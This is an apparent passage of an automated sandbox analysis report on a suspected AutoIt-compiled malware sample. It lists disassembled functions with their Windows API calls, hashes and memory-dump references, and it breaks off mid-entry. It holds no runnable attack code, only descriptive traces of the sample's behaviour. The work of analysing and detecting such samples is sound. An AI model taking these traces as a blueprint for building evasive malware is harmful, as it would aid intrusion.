                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 330120b93221b7a6d265398b5c546d24cafe08be7ee576141ec4e43d2fcfbb1d
                                                    • Instruction ID: 3aa0a19e28ca8695c6d27b18aa5323a5475d9e0491d859b36ca0b64e679ee0ff
                                                    • Opcode Fuzzy Hash: 330120b93221b7a6d265398b5c546d24cafe08be7ee576141ec4e43d2fcfbb1d
                                                    • Instruction Fuzzy Hash: CA314D31A00A05AFCB18DF6CC4A8AADF7B6FF48321F148629DC1693750D770B994CB91
                                                    Function 0068FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: ef027ffadee96574861ef34879feb10645617295a361f1f4c7d3ec70e0d34700
                                                    • Instruction ID: e8dc8cc7147e7f87dcdb1fccf69220465413fbe5dc97ee2802162d89b739a54b
                                                    • Opcode Fuzzy Hash: ef027ffadee96574861ef34879feb10645617295a361f1f4c7d3ec70e0d34700
                                                    • Instruction Fuzzy Hash: 16412774604341CFDB14DF14C444B5ABBE2BF49319F0989ACE99A8B762C332E849CF52
                                                    Function 006706FE Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5281ac648a44e9f301358fe957ebd07d634e8c437c758a8a874b8830b79bff63
                                                    • Instruction ID: 8071f21204a7c430200189b269ca3405b022d8047238b52eeb1402cd745e793c
                                                    • Opcode Fuzzy Hash: 5281ac648a44e9f301358fe957ebd07d634e8c437c758a8a874b8830b79bff63
                                                    • Instruction Fuzzy Hash: D721A23664C380BFE321CB24AC47FE27F66EB83760F14C49EF988568D1D1650966CBA5
                                                    Function 006559B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 9d48f5ef4250c759ce462b19c74abd87c651414f6316fee0af764fc564ce5670
                                                    • Instruction ID: f5d45161022a0c6a3b7736d80b4875e11ed354c72b4e97973656c775d03d1b50
                                                    • Opcode Fuzzy Hash: 9d48f5ef4250c759ce462b19c74abd87c651414f6316fee0af764fc564ce5670
                                                    • Instruction Fuzzy Hash: A4212B71500A04EBDB10AF61E8456AA7BBEFF00311F21C66EE486D5050DBB494D0D769
                                                    Function 00654DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00654BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00654BEF
                                                      • Part of subcall function 0067525B: __wfsopen.LIBCMT ref: 00675266
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654E0F
                                                      • Part of subcall function 00654B6A: FreeLibrary.KERNEL32(00000000), ref: 00654BA4
                                                      • Part of subcall function 00654C70: _memmove.LIBCMT ref: 00654CBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: ee4d8804922f91b507b8e8d01564e0f940864839589728af8cc71b8a9ecd3135
                                                    • Instruction ID: 8686a1e0c0237e1a39ac9d154f326581f8483c0617ca96c3c6631e7cbe340921
                                                    • Opcode Fuzzy Hash: ee4d8804922f91b507b8e8d01564e0f940864839589728af8cc71b8a9ecd3135
                                                    • Instruction Fuzzy Hash: D0112731600205ABCF14BF70C803FAD77A7AF44745F10846DF942A7181DE719A899B64
                                                    Function 0068FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: d1f8f123862a325a77a98127ce6aa27db8c72e821bf06e87630a17c56ebb0fe6
                                                    • Instruction ID: 0161a8b311c711c11783dccbbfd0b88c920263635fcb899d1e2c506b303517de
                                                    • Opcode Fuzzy Hash: d1f8f123862a325a77a98127ce6aa27db8c72e821bf06e87630a17c56ebb0fe6
                                                    • Instruction Fuzzy Hash: CF212574908302DFDB14DF64C444B5ABBE2BF88315F058A6CF88A57722D731E849CBA2
                                                    Function 00655BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,006556A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00655C16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 7eaf1c21f220819cd8c25ef7c7883ecb49b2a5268264fc0d77fd11462a92c0d3
                                                    • Instruction ID: 3b239db765f03f7347140ec84f3722eaa1e91c54fc66fcbfc63ae0cb1d97d89a
                                                    • Opcode Fuzzy Hash: 7eaf1c21f220819cd8c25ef7c7883ecb49b2a5268264fc0d77fd11462a92c0d3
                                                    • Instruction Fuzzy Hash: 4C113A75200B059FD3208F19C8A8BA6B7E6EF44761F10C92EE99B86A51D771E849CB60
                                                    Function 00655A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 37c3bb1f29870e84f0749f53f84cc2f20e31eb940535627f726d211e13bb0f16
                                                    • Instruction ID: 0f445635e36040174870d5a3d165e99d19edd09042c83fa0c2a0ded25f5f9e4c
                                                    • Opcode Fuzzy Hash: 37c3bb1f29870e84f0749f53f84cc2f20e31eb940535627f726d211e13bb0f16
                                                    • Instruction Fuzzy Hash: A1017CB5200A42AFC305EB68C455D26F7AAFF8A3107148569F819C7702DB35EC21CBE4
                                                    Function 00674863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 006748A6
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 2f079344d85a71cef258a2405812345c3caeb190018816255ecc9a77eb55386a
                                                    • Instruction ID: 6c31ca9e1915eedb9e1436acc87a8db85658587eaefe440ac43e83c0f3cccf5e
                                                    • Opcode Fuzzy Hash: 2f079344d85a71cef258a2405812345c3caeb190018816255ecc9a77eb55386a
                                                    • Instruction Fuzzy Hash: CFF08C71940609EBDB91AFA4880E7EE36A2AF00325F15C518F42C9B291CF79C951DB56
                                                    Function 00654E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654E7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: a7f744f32945348ff980a0f4f835cfffadd7d7b94e6ee8ffd8c1cbca47c1a339
                                                    • Instruction ID: f26c3e124e5851d6ae0217822b567d76b799d88b5e698408dbb3b58269c87d81
                                                    • Opcode Fuzzy Hash: a7f744f32945348ff980a0f4f835cfffadd7d7b94e6ee8ffd8c1cbca47c1a339
                                                    • Instruction Fuzzy Hash: 75F03071505751CFCB349F64E495856B7E2BF1432A72089BEE6D782621CB719888DF40
                                                    Function 00670791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006707B0
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 8def58c31d4acd308bdf3c9ae5d42c125952040a1c8b55639211acbadb7685df
                                                    • Instruction ID: 457d93877ad780ecfbcafa18c14e80809e602588a40f91871851e8a732dfae2b
                                                    • Opcode Fuzzy Hash: 8def58c31d4acd308bdf3c9ae5d42c125952040a1c8b55639211acbadb7685df
                                                    • Instruction Fuzzy Hash: 97E0CD3690512857C720E6999C05FEA77DEDF897A1F0441F6FC0CD7244D9609D8086D4
                                                    Function 006B8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction ID: 71c92081a15c223e8b41ac689c2f6b08bf67637418b1cd08650e1a53f54734a1
                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction Fuzzy Hash: 7DE092B0104B045FD7388A24D840BE373E6AB05304F00085DF2AA83341EBA3B882C759
                                                    Function 00655C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0068DD42,?,?,00000000), ref: 00655C5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: c6ac195b14ec81b066d1accb97d6907b0b92a6d926caa5929ca9f59192f8dab9
                                                    • Instruction ID: 62be7f704cae78d717af59a5219fc28651c71528bb53a3a82481e17ddfeb7fcd
                                                    • Opcode Fuzzy Hash: c6ac195b14ec81b066d1accb97d6907b0b92a6d926caa5929ca9f59192f8dab9
                                                    • Instruction Fuzzy Hash: B2D0C77464020CBFE710DB80DC46FA9777DD745710F100195FD0456290D6B27D508795
                                                    Function 0067525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: 760221b91cc9f9b0202a97603a3fea3426845fdb97a2a1db4a51474c97fc2115
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 12B0927644020C77CE012A82EC02A493B1A9B41764F408060FB1C18162E6B3A6649A89
                                                    Function 006BD07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 006BD1FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: e1d3f15a1119d71fbe60f1ac46bf8fbb59bf77b9e3dc2642b7b18b551afb65a3
                                                    • Instruction ID: 0cd8d24ffd93ad1d1160ada8f18262b136ee06113c1dae18d27e1e3480a0c4fa
                                                    • Opcode Fuzzy Hash: e1d3f15a1119d71fbe60f1ac46bf8fbb59bf77b9e3dc2642b7b18b551afb65a3
                                                    • Instruction Fuzzy Hash: C3718270204341CFC754EF68C491AAAB7E2EF89314F04492DF9969B3A1DB30EE49CB56
                                                    Function 00670C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 2e2ccb1a9763124fc58dfdca80ab3e084dd7a8c976d75ea93164517429f9d6ac
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 2631A274A00105DBE71ADF58C484AA9FBA6FB59300B64C7A5E80ACB355D631EDC2DBA0
                                                    Function 032D22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 032D22B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: af5f08219b88903d9daeb51d5da6ed02c031f28f9b0afd97ff9c0b28b98fffb3
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: DDE0E67594020EDFDB00EFB8D94D69E7FB4EF04301F1005A1FD01D2280D6309D509A72

                                                    Non-executed Functions

                                                    Function 006DCABC Relevance: 79.4, APIs: 40, Strings: 5, Instructions: 632windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006DCB37
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006DCB95
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DCBD6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006DCC00
                                                    • SendMessageW.USER32 ref: 006DCC29
                                                    • _wcsncpy.LIBCMT ref: 006DCC95
                                                    • GetKeyState.USER32(00000011), ref: 006DCCB6
                                                    • GetKeyState.USER32(00000009), ref: 006DCCC3
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006DCCD9
                                                    • GetKeyState.USER32(00000010), ref: 006DCCE3
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006DCD0C
                                                    • SendMessageW.USER32 ref: 006DCD33
                                                    • SendMessageW.USER32(?,00001030,?,006DB348), ref: 006DCE37
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006DCE4D
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006DCE60
                                                    • SetCapture.USER32(?), ref: 006DCE69
                                                    • ClientToScreen.USER32(?,?), ref: 006DCECE
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006DCEDB
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006DCEF5
                                                    • ReleaseCapture.USER32 ref: 006DCF00
                                                    • GetCursorPos.USER32(?), ref: 006DCF3A
                                                    • ScreenToClient.USER32(?,?), ref: 006DCF47
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 006DCFA3
                                                    • SendMessageW.USER32 ref: 006DCFD1
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 006DD00E
                                                    • SendMessageW.USER32 ref: 006DD03D
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006DD05E
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 006DD06D
                                                    • GetCursorPos.USER32(?), ref: 006DD08D
                                                    • ScreenToClient.USER32(?,?), ref: 006DD09A
                                                    • GetParent.USER32(?), ref: 006DD0BA
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 006DD123
                                                    • SendMessageW.USER32 ref: 006DD154
                                                    • ClientToScreen.USER32(?,?), ref: 006DD1B2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006DD1E2
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 006DD20C
                                                    • SendMessageW.USER32 ref: 006DD22F
                                                    • ClientToScreen.USER32(?,?), ref: 006DD281
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006DD2B5
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DD351
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
